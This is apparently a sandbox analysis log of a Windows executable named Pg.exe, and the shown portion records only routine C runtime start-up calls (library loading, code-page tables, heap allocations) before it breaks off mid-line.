# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: May 3 2019 14:51:36 # Log Creation Date: 15.05.2019 00:23:49.250 Process: id = "1" image_name = "pg.exe" filename = "c:\\users\\fd1hvy\\desktop\\pg.exe" page_root = "0x7be54000" os_pid = "0x6d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\Pg.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x6c0 [0180.935] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0180.936] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0180.936] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionEx") returned 0x74f97060 [0180.936] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0180.937] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74f9bea0 [0180.937] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74f92550 [0180.938] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0180.938] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionEx") returned 0x74f97060 [0180.938] GetProcessHeap () returned 0x5e0000 [0180.938] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0180.938] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74f9bea0 [0180.938] GetLastError () returned 0xcb [0180.939] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsGetValue") returned 0x74f870c0 [0180.939] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74f92550 [0180.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x364) returned 0x608978 [0180.939] SetLastError (dwErrCode=0xcb) [0180.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xe00) returned 0x608ce8 [0181.112] GetStartupInfoW (in: lpStartupInfo=0x19fe9c | out: lpStartupInfo=0x19fe9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Pg.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0181.112] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0181.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0181.112] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0181.112] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\Pg.exe\" " [0181.112] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\Pg.exe\" " [0181.112] GetACP () returned 0x4e4 [0181.112] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x220) returned 0x5f7a30 [0181.112] IsValidCodePage (CodePage=0x4e4) returned 1 [0181.112] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19febc | out: lpCPInfo=0x19febc) returned 1 [0181.112] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f784 | out: lpCPInfo=0x19f784) returned 1 [0181.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0181.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x19f528, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ臏AĀ") returned 256 [0181.112] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ臏AĀ", cchSrc=256, lpCharType=0x19f798 | out: lpCharType=0x19f798) returned 1 [0181.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0181.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x19f4d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0181.112] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0181.112] GetProcAddress (hModule=0x74ea0000, lpProcName="LCMapStringEx") returned 0x74f7ed00 [0181.112] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0181.113] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x19f2c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0181.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x19fc98, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x26\xf8\xbd\xd3\xd4\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0181.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0181.113] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x19f4f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꅍAĀ") returned 256 [0181.113] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꅍAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0181.113] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꅍAĀ", cchSrc=256, lpDestStr=0x19f2e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0181.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x19fb98, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x26\xf8\xbd\xd3\xd4\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0181.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x80) returned 0x5f0dd8 [0181.113] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x42fc58, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Pg.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pg.exe")) returned 0x1e [0181.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x46) returned 0x5f8148 [0181.113] RtlInitializeSListHead (in: ListHead=0x42f870 | out: ListHead=0x42f870) [0181.113] GetLastError () returned 0x0 [0181.113] SetLastError (dwErrCode=0x0) [0181.113] GetEnvironmentStringsW () returned 0x606e40* [0181.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xaca) returned 0x609af0 [0181.113] FreeEnvironmentStringsW (penv=0x606e40) returned 1 [0181.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x94) returned 0x5f0ec8 [0181.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3e) returned 0x5f1df8 [0181.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x50) returned 0x5f8920 [0181.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x6e) returned 0x5f7030 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x78) returned 0x5f4650 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x62) returned 0x5ee900 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x28) returned 0x5fb278 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x48) returned 0x5f83c8 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1a) returned 0x601868 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f3078 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x56) returned 0x5ee6a0 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2a) returned 0x5f3200 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f30b0 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x44) returned 0x5f8418 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1c) returned 0x601890 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x182) returned 0x5f39a0 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x7c) returned 0x5ee438 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x36) returned 0x603e38 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3a) returned 0x5f1a08 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x90) returned 0x5ee720 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x24) returned 0x5faee8 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f3158 [0181.114] RtlAllocateHeap 